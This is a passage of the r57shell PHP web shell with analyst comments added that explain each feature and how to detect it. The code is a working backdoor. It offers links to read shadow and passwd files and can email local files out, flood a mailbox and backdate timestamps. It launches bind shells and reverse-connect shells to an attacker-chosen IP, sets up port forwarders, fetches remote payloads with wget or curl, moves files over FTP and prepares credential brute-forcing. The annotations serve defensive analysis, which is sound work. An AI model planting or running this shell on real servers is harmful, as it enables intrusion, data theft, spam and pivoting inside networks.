4352 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?8' title=\"View hosts\"><b>hosts</b></a> ".$rb;
4353
4354 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?9' title=\"View shadow\"><b>shadow</b></a> ".$rb;
4355
4356 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?10' title=\"".$lang[$language.'_text95']."\"><b>passwd</b></a> ".$rb;
4357
4358}
4359
4360echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?11' title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
4361
4362echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?12' title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb;
4363
4364
4365
// The remaining entries are only shown on Unix hosts where safe_mode is off.
4366if($unix && !$safe_mode)
4367
4368{
4369
4370 echo "<br>".ws(2)."</b>";
4371
4372 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?13' title=\"View procinfo\"><b>procinfo</b></a> ".$rb;
4373
4374 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?14' title=\"View proc version\"><b>version</b></a> ".$rb;
4375
4376 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?15' title=\"View mem free\"><b>free</b></a> ".$rb;
4377
4378 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?16' title=\"View dmesg\"><b>dmesg</b></a> ".$rb;
4379
4380 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?17' title=\"View vmstat\"><b>vmstat</b></a> ".$rb;
4381
4382 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?18' title=\"View lspci\"><b>lspci</b></a> ".$rb;
4383
4384 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?19' title=\"View lsdev\"><b>lsdev</b></a> ".$rb;
4385
4386 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?20' title=\"View interrupts\"><b>interrupts</b></a> ".$rb;
4387
4388 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?21' title=\"View realise1\"><b>realise1</b></a> ".$rb;
4389
4390 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?22' title=\"View realise2\"><b>realise2</b></a> ".$rb;
4391
4392 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?23' title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;
4393
4394
4395
4396 echo "<br>".ws(2)."</b>";
4397
4398 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?24' title=\"View w\"><b>w</b></a> ".$rb;
4399
4400 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?25' title=\"View who\"><b>who</b></a> ".$rb;
4401
4402 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?26' title=\"View uptime\"><b>uptime</b></a> ".$rb;
4403
4404 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?27' title=\"View last -n 10\"><b>last</b></a> ".$rb;
4405
4406 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?28' title=\"View ps -aux\"><b>ps aux</b></a> ".$rb;
4407
4408 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?29' title=\"View service\"><b>service</b></a> ".$rb;
4409
4410 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?30' title=\"View ifconfig\"><b>ifconfig</b></a> ".$rb;
4411
4412 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?31' title=\"View netstat -a\"><b>netstat</b></a> ".$rb;
4413
4414 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?32' title=\"View fstab\"><b>fstab</b></a> ".$rb;
4415
4416 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?33' title=\"View fdisk -l\"><b>fdisk</b></a> ".$rb;
4417
4418 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?34' title=\"View df -h\"><b>df -h</b></a> ".$rb;
4419
4420}
4421
4422
4423
4424echo '</font></td></tr><table>
4425
4426<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
4427
4428<tr><td align=right width=100>';
4429
4430echo $font;
4431
4432
4433
4434if($unix){
4435
4436echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
4437
4438echo "</td><td>";
4439
4440echo "<font face=Verdana size=-2 color=red><b>";
4441
4442echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
4443
4444echo ws(3).$sysctl."<br>";
4445
4446echo ws(3).ex('echo $OSTYPE')."<br>";
4447
4448echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
4449
4450if(!empty($id)) { echo ws(3).$id."<br>"; }
4451
4452else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid'))
4453
4454 {
4455
4456 $euserinfo = @posix_getpwuid(@posix_geteuid());
4457
4458 $egroupinfo = @posix_getgrgid(@posix_getegid());
4459
4460 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
4461
4462 }
4463
4464else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
4465
4466echo ws(3).$dir;
4467
4468echo ws(3).'( '.perms(@fileperms($dir)).' )';
4469
4470echo "</b></font>";
4471
4472}
4473
4474else
4475
4476{
4477
4478echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
4479
4480echo "</td><td>";
4481
4482echo "<font face=Verdana size=-2 color=red><b>";
4483
4484echo ws(3).@substr(@php_uname(),0,120)."<br>";
4485
4486echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
4487
4488echo ws(3).@getenv("USERNAME")."<br>";
4489
4490echo ws(3).$dir;
4491
4492echo "<br></font>";
4493
4494}
4495
4496echo "</font>";
4497
4498echo "</td></tr></table>";
4499
4500
4501
// Analyst note: mail relay handler (cmd=mail). Recipient, subject, body and From
// header all come from the POST body and go to PHP mail(), so the message leaves
// through the compromised host's own MTA and carries its reputation.
// Detection: MTA logs showing mail submitted by the web-server account to external
// recipients; POST requests to the script with fields to/subj/text/from.
4502if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
4503
4504 {
4505
4506 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
4507
// err() is defined outside this chunk; it is called with 6 or 7 depending on mail()'s boolean result.
4508 err(6+$res);
4509
4510 $_POST['cmd']="";
4511
4512 }
4513
// Analyst note: file exfiltration by e-mail (cmd=mail_file). A local path from the
// POST body is read with moreread(), falling back to readzlib(). The content is then
// passed through compress() with the POSTed option and sent as an attachment by
// mailattach(). All four helpers are defined outside this chunk.
// Indicators visible here: default subject 'file from r57shell' and default sender
// 'billy@microsoft.com' when the operator leaves those fields empty.
// Detection: outbound mail with attachments from the web-server account; those two
// default strings in MTA logs or mail-gateway content rules.
4514if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
4515
4516 {
4517
4518 if($file=moreread($_POST['loc_file'])){ $filedump = $file; }
4519
4520 else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
4521
4522 if(!empty($_POST['cmd']))
4523
4524 {
4525
4526 $filename = @basename($_POST['loc_file']);
4527
4528 $content_encoding=$mime_type='';
4529
// NOTE(review): compress() presumably modifies $filename/$filedump and sets $mime_type by reference or via globals; confirm.
4530 compress($filename,$filedump,$_POST['compress']);
4531
4532 $attach = array(
4533
4534 "name"=>$filename,
4535
4536 "type"=>$mime_type,
4537
4538 "content"=>$filedump
4539
4540 );
4541
4542 if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
4543
4544 if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
4545
4546 $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
4547
4548 err(6+$res);
4549
4550 $_POST['cmd']="";
4551
4552 }
4553
4554 }
4555
// Analyst note: mail flooding handler (cmd=mail_bomber). Sends the same message
// `mail_flood` times to one recipient, each copy padded with 1024 * `mail_size`
// spaces. Neither value is bounded here, so a single request can occupy the PHP
// worker and the local MTA queue for as long as the loop runs.
// Detection: sudden mail-queue growth, many identical messages to one recipient
// from the web-server account, long-running PHP requests to this script.
4556if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size']))
4557
4558 {
4559
4560 for($h=1;$h<=$_POST['mail_flood'];$h++){
4561
4562 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
4563
4564 }
4565
// Only the result of the last mail() call is reported.
4566 err(6+$res);
4567
4568 $_POST['cmd']="";
4569
4570 }
4571
// Analyst note: content search (cmd=find_text). Rewrites $_POST['cmd'] into a
// `find <dir> -name '<mask>' | xargs grep -E '<text>'` pipeline built from POST fields.
// The command is not run here; it is presumably executed by the generic command
// runner later in the file (not visible in this chunk).
// Detection: find piped to xargs grep under the web-server account, typically
// searching configuration files for credentials.
4572if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
4573
4574{
4575
4576$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
4577
4578}
4579
// Analyst note: ownership and permission changes (cmd=ch_). `what` selects chown,
// chgrp or chmod; `param1` is the path and `param2` the owner, group, or octal mode.
// Errors are suppressed with @, so a failed call produces no output.
// Detection: file-integrity monitoring alerts for mode or owner changes on files
// under the web root made by the web-server account.
4580if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
4581
4582 {
4583
4584 switch($_POST['what'])
4585
4586 {
4587
4588 case 'own':
4589
4590 @chown($_POST['param1'],$_POST['param2']);
4591
4592 break;
4593
4594 case 'grp':
4595
4596 @chgrp($_POST['param1'],$_POST['param2']);
4597
4598 break;
4599
4600 case 'mod':
4601
// The mode string is parsed as base 8, e.g. "755".
4602 @chmod($_POST['param1'],intval($_POST['param2'], 8));
4603
4604 break;
4605
4606 }
4607
4608 $_POST['cmd']="";
4609
4610 }
4611
4612if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
4613
4614 {
4615
4616 switch($_POST['what'])
4617
4618 {
4619
4620 case 'file':
4621
4622 if($_POST['action'] == "create")
4623
4624 {
4625
4626 if(@file_exists($_POST['mk_name']) || !morewrite($_POST['mk_name'],'your text here')) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
4627
4628 else {
4629
4630 $_POST['e_name'] = $_POST['mk_name'];
4631
4632 $_POST['cmd']="edit_file";
4633
4634 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
4635
4636 }
4637
4638 }
4639
4640 else if($_POST['action'] == "delete")
4641
4642 {
4643
4644 if(@unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
4645
4646 $_POST['cmd']="";
4647
4648 }
4649
4650 break;
4651
4652 case 'dir':
4653
4654 if($_POST['action'] == "create"){
4655
4656 if(@mkdir($_POST['mk_name']))
4657
4658 {
4659
4660 $_POST['cmd']="";
4661
4662 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
4663
4664 }
4665
4666 else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
4667
4668 }
4669
4670 else if($_POST['action'] == "delete"){
4671
4672 if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
4673
4674 $_POST['cmd']="";
4675
4676 }
4677
4678 break;
4679
4680 }
4681
4682 }
4683
4684
4685
4686
4687
// Analyst note: timestamp manipulation (cmd=touch). If no reference file is given,
// the POSTed day/month/year/hour/minute/second fields are joined into a string,
// parsed with strtotime(), and applied as both mtime and atime of `file_name`.
// Otherwise the mtime of `file_name_r` is copied onto `file_name`.
// Forensics: mtime and atime on files touched by this shell are unreliable. touch()
// cannot set the inode change time, so on filesystems that record ctime, a ctime
// newer than mtime marks the file as altered.
4688if(!empty($_POST['cmd']) && $_POST['cmd']=="touch")
4689
4690{
4691
4692if(!$_POST['file_name_r'])
4693
4694 {
4695
4696 $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
4697
4698 $datar = @strtotime($datar);
4699
4700 @touch($_POST['file_name'],$datar,$datar);}
4701
4702else{
4703
4704 @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
4705
4706}
4707
4708$_POST['cmd']="";
4709
4710}
4711
4712
4713
4714
4715
4716if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
4717
4718 {
4719
4720 if(@is_dir($_POST['e_name'])){ err(1,$_POST['e_name']); $_POST['cmd']=""; }
4721
4722 elseif($file=moreread($_POST['e_name'])) { $filedump = $file; if(!@is_writable($_POST['e_name'])) { $only_read = 1; }; }
4723
4724 elseif($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; }
4725
4726 elseif(@file_exists($_POST['e_name'])) {$filedump = 'NONE'; if(!@is_writable($_POST['e_name'])) { $only_read = 1; };}
4727
4728 else { err(1,$_POST['e_name']); $_POST['cmd']=""; }
4729
4730 if(!empty($_POST['cmd']))
4731
4732 {
4733
4734 echo $table_up3;
4735
4736 echo $font;
4737
4738 echo "<form name=save_file method=post>";
4739
4740 echo ws(3)."<b>".$_POST['e_name']."</b>";
4741
4742 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
4743
4744 echo @htmlspecialchars($filedump);
4745
4746 echo "</textarea>";
4747
4748 echo "<input type=hidden name=e_name value='".$_POST['e_name']."'>";
4749
4750 echo "<input type=hidden name=dir value='".$dir."'>";
4751
4752 echo "<input type=hidden name=cmd value=save_file>";
4753
4754 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
4755
4756 echo "</div>";
4757
4758 echo "</font>";
4759
4760 echo "</form>";
4761
4762 echo "</td></tr></table>";
4763
4764 exit();
4765
4766 }
4767
4768 }
4769
// Analyst note: in-place file edit with timestamp preservation (cmd=save_file). The
// target's mtime is read before the write and restored with touch() afterwards, so
// an edited file keeps its old modification time.
// Forensics: mtime-based "recently changed files" sweeps miss these edits. Compare
// ctime, content hashes against a known-good baseline, or version-control state.
4770if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
4771
4772 {
4773
4774 $mtime = @filemtime($_POST['e_name']);
4775
4776 if(!@is_writable($_POST['e_name'])) { err(0,$_POST['e_name']); }
4777
4778 else {
4779
// On Unix, CRLF line endings from the browser textarea are converted to LF before writing.
4780 if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
4781
4782 morewrite($_POST['e_name'],$_POST['e_text']);
4783
4784 $_POST['cmd']="";
4785
4786 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
4787
4788 }
4789
// Runs on both branches: the saved mtime is re-applied as mtime and atime.
4790 @touch($_POST['e_name'],$mtime,$mtime);
4791
4792 }
4793
4794
4795
4796
4797
// Analyst note: HTTP proxy launcher (use=Perl with proxy_port). cf() (defined
// outside this chunk) is given the path `<tempdir>prxpl` and $prx_pl, the base64
// blob assigned above that starts with a Perl shebang; it presumably decodes and
// writes the script, confirm. The script is started in the background with the
// POSTed port, then the file is unlinked while the process keeps running.
// Detection: a perl process owned by the web-server account with a listening TCP
// socket and a script path that no longer exists on disk; short-lived files named
// `prxpl` in temp directories; `ps -aux | grep prxpl` spawned by the web server.
4798if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl"))
4799
4800{
4801
4802 cf($tempdir.'prxpl',$prx_pl);
4803
4804 $p2=which("perl");
4805
4806 $blah = ex($p2.' '.$tempdir.'prxpl '.$_POST['proxy_port'].' &');
4807
4808 @unlink($tempdir.'prxpl');
4809
// Queues a process listing as the next command, presumably shown by the command runner later in the file.
4810 $_POST['cmd']="ps -aux | grep prxpl";
4811
4812}
4813
// Analyst note: bind-shell launcher, C variant (use=C with port and bind_pass).
// Writes `<tempdir>bd.c` from $port_bind_bd_c (defined outside this chunk),
// compiles it with gcc, runs the binary in the background with the port and
// password as arguments, and unlinks both the source and the binary.
// Detection: gcc invoked by the web-server account; a process whose executable is
// reported as deleted (e.g. /proc/<pid>/exe) holding a listening socket; files named
// `bd.c` or `bd` appearing briefly in temp directories.
4814if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
4815
4816{
4817
4818 cf($tempdir.'bd.c',$port_bind_bd_c);
4819
4820 $blah = ex('gcc -o '.$tempdir.'bd '.$tempdir.'bd.c');
4821
4822 @unlink($tempdir.'bd.c');
4823
4824 $blah = ex($tempdir.'bd '.$_POST['port'].' '.$_POST['bind_pass'].' &');
4825
4826 @unlink($tempdir.'bd');
4827
4828 $_POST['cmd']="ps -aux | grep bd";
4829
4830}
4831
// Analyst note: bind-shell launcher, Perl variant (use=Perl with port and
// bind_pass). Writes `<tempdir>bdpl` from $port_bind_bd_pl (defined outside this
// chunk), runs it under perl in the background, and unlinks the script.
// Detection: perl started by the web-server account with a temp-directory script
// path; a listening socket owned by that account; `ps -aux | grep bdpl`.
4832if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
4833
4834{
4835
4836 cf($tempdir.'bdpl',$port_bind_bd_pl);
4837
4838 $p2=which("perl");
4839
4840 $blah = ex($p2.' '.$tempdir.'bdpl '.$_POST['port'].' &');
4841
4842 @unlink($tempdir.'bdpl');
4843
4844 $_POST['cmd']="ps -aux | grep bdpl";
4845
4846}
4847
// Analyst note: reverse-connection launcher, Perl variant (use=Perl with ip and
// port). Writes `<tempdir>back` from $back_connect (defined outside this chunk),
// runs it under perl in the background with the destination address and port, and
// unlinks the script.
// Detection: outbound TCP connections from a perl process owned by the web-server
// account; egress filtering on the web tier blocks this path entirely.
4848if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
4849
4850{
4851
4852 cf($tempdir.'back',$back_connect);
4853
4854 $p2=which("perl");
4855
4856 $blah = ex($p2.' '.$tempdir.'back '.$_POST['ip'].' '.$_POST['port'].' &');
4857
4858 @unlink($tempdir.'back');
4859
4860 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
4861
4862}
4863
// Analyst note: reverse-connection launcher, C variant (use=C with ip and port).
// Writes `<tempdir>back.c` from $back_connect_c (defined outside this chunk),
// compiles it to `<tempdir>backc`, deletes the source, and runs the binary in the
// background with the destination address and port.
// Forensics: the final unlink targets `<tempdir>back`, not `<tempdir>backc`, so the
// compiled binary is left on disk. A file named `backc` in /tmp, /dev/shm, /var/tmp
// or the PHP session/upload directory is a recoverable artifact of this handler.
4864if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
4865
4866{
4867
4868 cf($tempdir.'back.c',$back_connect_c);
4869
4870 $blah = ex('gcc -o '.$tempdir.'backc '.$tempdir.'back.c');
4871
4872 @unlink($tempdir.'back.c');
4873
4874 $blah = ex($tempdir.'backc '.$_POST['ip'].' '.$_POST['port'].' &');
4875
4876 @unlink($tempdir.'back');
4877
4878 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
4879
4880}
4881
// Analyst note: TCP port-forwarder launcher, Perl variant (use=Perl with local_port,
// remote_host and remote_port). Writes `<tempdir>dp` from $datapipe_pl, the base64
// blob assigned above that starts with a Perl shebang, runs it in the background,
// and unlinks it. A forwarder turns the web server into a pivot toward hosts that
// only it can reach.
// Detection: a new listening socket owned by the web-server account paired with
// outbound connections to internal addresses; `ps -aux | grep dp`.
4882if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
4883
4884{
4885
4886 cf($tempdir.'dp',$datapipe_pl);
4887
4888 $p2=which("perl");
4889
4890 $blah = ex($p2.' '.$tempdir.'dp '.$_POST['local_port'].' '.$_POST['remote_host'].' '.$_POST['remote_port'].' &');
4891
4892 @unlink($tempdir.'dp');
4893
4894 $_POST['cmd']="ps -aux | grep dp";
4895
4896}
4897
// Analyst note: TCP port-forwarder launcher, C variant (use=C with local_port,
// remote_host and remote_port). Writes `<tempdir>dpc.c` from $datapipe_c (assigned
// outside this chunk), compiles it with gcc, runs the binary in the background, and
// unlinks both the source and the binary.
// Detection: gcc run by the web-server account; a process with a deleted executable
// that both listens and connects out; files named `dpc.c` or `dpc` in temp directories.
4898if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
4899
4900{
4901
4902 cf($tempdir.'dpc.c',$datapipe_c);
4903
4904 $blah = ex('gcc -o '.$tempdir.'dpc '.$tempdir.'dpc.c');
4905
4906 @unlink($tempdir.'dpc.c');
4907
4908 $blah = ex($tempdir.'dpc '.$_POST['local_port'].' '.$_POST['remote_port'].' '.$_POST['remote_host'].' &');
4909
4910 @unlink($tempdir.'dpc');
4911
4912 $_POST['cmd']="ps -aux | grep dpc";
4913
4914}
4915
4916
4917
4918if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
4919
4920
4921
// Analyst note: multi-file upload. Checks form fields userfile0 through userfile16
// and moves each uploaded file into the POSTed `dir`. The first file may be renamed
// through `new_name`; the rest keep the client-supplied name.
// NOTE(review): this reads $HTTP_POST_FILES, the legacy long-array name that PHP 5.4
// removed. Unless the file aliases it to $_FILES elsewhere, this loop finds nothing
// on newer runtimes.
// Detection: multipart POSTs to the script; new files owned by the web-server
// account in directories that should be read-only to it.
4922for($upl=0;$upl<=16;$upl++)
4923
4924{
4925
4926 if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
4927
4928 if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }
4929
4930 else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }
4931
4932 @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
4933
4934 or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
4935
4936 }
4937
4938}
4939
4940
4941
// Analyst note: remote file retrieval. `with` selects how `rem_file` is fetched
// into `loc_file`. The 'fopen' case reads the URL in-process with file() and writes
// it with morewrite(). Every other case only builds a command line for wget, fetch,
// lynx, links, GET or curl and stores it in $_POST['cmd'], presumably for the
// generic command runner later in the file (not visible in this chunk).
// Detection: outbound HTTP/FTP from the web-server account, in-process or through
// these binaries. Disabling allow_url_fopen and restricting egress from the web tier
// removes both paths.
4942if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
4943
4944{
4945
4946 switch($_POST['with'])
4947
4948 {
4949
4950 case 'fopen':
4951
4952 $datafile = @implode("", @file($_POST['rem_file']));
4953
4954 if($datafile)
4955
4956 {
4957
4958 if(!morewrite($_POST['loc_file'],$datafile)){ err(0);};
4959
4960 }
4961
4962
4963
4964 $_POST['cmd'] = '';
4965
4966 break;
4967
4968 case 'wget':
4969
4970 $_POST['cmd'] = which('wget')." \"".$_POST['rem_file']."\" -O \"".$_POST['loc_file']."\"";
4971
4972 break;
4973
4974 case 'fetch':
4975
4976 $_POST['cmd'] = which('fetch')." -p \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\"";
4977
4978 break;
4979
4980 case 'lynx':
4981
4982 $_POST['cmd'] = which('lynx')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
4983
4984 break;
4985
4986 case 'links':
4987
4988 $_POST['cmd'] = which('links')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
4989
4990 break;
4991
4992 case 'GET':
4993
4994 $_POST['cmd'] = which('GET')." \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
4995
4996 break;
4997
4998 case 'curl':
4999
5000 $_POST['cmd'] = which('curl')." \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\"";
5001
5002 break;
5003
5004 }
5005
5006}
5007
// Analyst note: FTP transfer between the compromised host and a server named in the request.
// Runs for the pseudo-commands ftp_file_up and ftp_file_down; server, port, login, password,
// both file paths and the transfer mode all come from POST fields and are used as received.
// split() is the legacy regex splitter, one more sign that the sample was written for old PHP.
// Defender view: the web tier normally has no reason to open outbound FTP sessions, so an egress
// rule for port 21 (and logging of denied attempts) both blocks and reveals this path; uploads
// through ftp_put are a data-exfiltration channel, downloads through ftp_get a tool-staging one.
5008if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down")))
5009
5010 {
5011
5012 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
5013
5014 if(empty($ftp_port)) { $ftp_port = 21; }
5015
// Third argument is the connect timeout in seconds.
5016 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
5017
5018 if(!$connection) { err(3); }
5019
5020 else
5021
5022 {
5023
5024 if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
5025
5026 else
5027
5028 {
5029
// When loc_file is just the current directory, the remote file's base name is appended to it.
5030 if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}
5031
5032 if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}
5033
5034 }
5035
5036 }
5037
// Called even when ftp_connect() failed; the '@' hides the resulting warning.
5038 @ftp_close($connection);
5039
// Cleared so the pseudo-command is not handed to the shell later in the script.
5040 $_POST['cmd'] = "";
5041
5042 }
5043
5044
5045
// Analyst note: preparation step for the two credential-guessing pseudo-commands (ftp_brute,
// db_brute). It checks that the FTP target is reachable and loads the candidate list into $users
// through get_users() (helper defined elsewhere). With brute_method=passwd the candidates come
// from /etc/passwd on this host; with brute_method=dic they come from a file path in the request.
// On any failure $_POST['cmd'] is cleared, which disables the guessing loops further down.
// Defender view: reads of /etc/passwd by the web-server account followed by bursts of outbound
// authentication attempts tie the two halves of this feature together in host and network logs.
5046if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute")))
5047
5048 {
5049
5050 if($_POST['cmd']=="ftp_brute"){
5051
5052 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
5053
5054 if(empty($ftp_port)) { $ftp_port = 21; }
5055
5056 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
5057
5058 }else if($_POST['cmd']=="db_brute"){
5059
// No reachability probe for the database case; a truthy placeholder lets the checks below run.
5060 $connection = 1;
5061
5062 }
5063
5064 if(!$connection) { err(3); $_POST['cmd'] = ""; }
5065
5066 else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
5067
// The \' sits inside a double-quoted string, so the backslash is printed literally in the message.
5068 else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
5069
5070 if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}
5071
5072 }
5073
5074
5075
// Analyst note: opens the report panel. When no command was posted, a directory listing is chosen
// as the default: "dir" or "ls -lia" outside safe_mode, the internal "safe_dir" handler inside it.
// The command text is then echoed into the page without HTML escaping, ahead of the <textarea>
// that receives the output.
// Defender view: the default means that merely loading the page makes the web-server account run
// a directory listing, a useful process-creation indicator even when POST bodies are not logged.
5076echo $table_up3;
5077
5078if (empty($_POST['cmd']) && !$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
5079
5080else if(empty($_POST['cmd']) && $safe_mode){ $_POST['cmd']="safe_dir"; }
5081
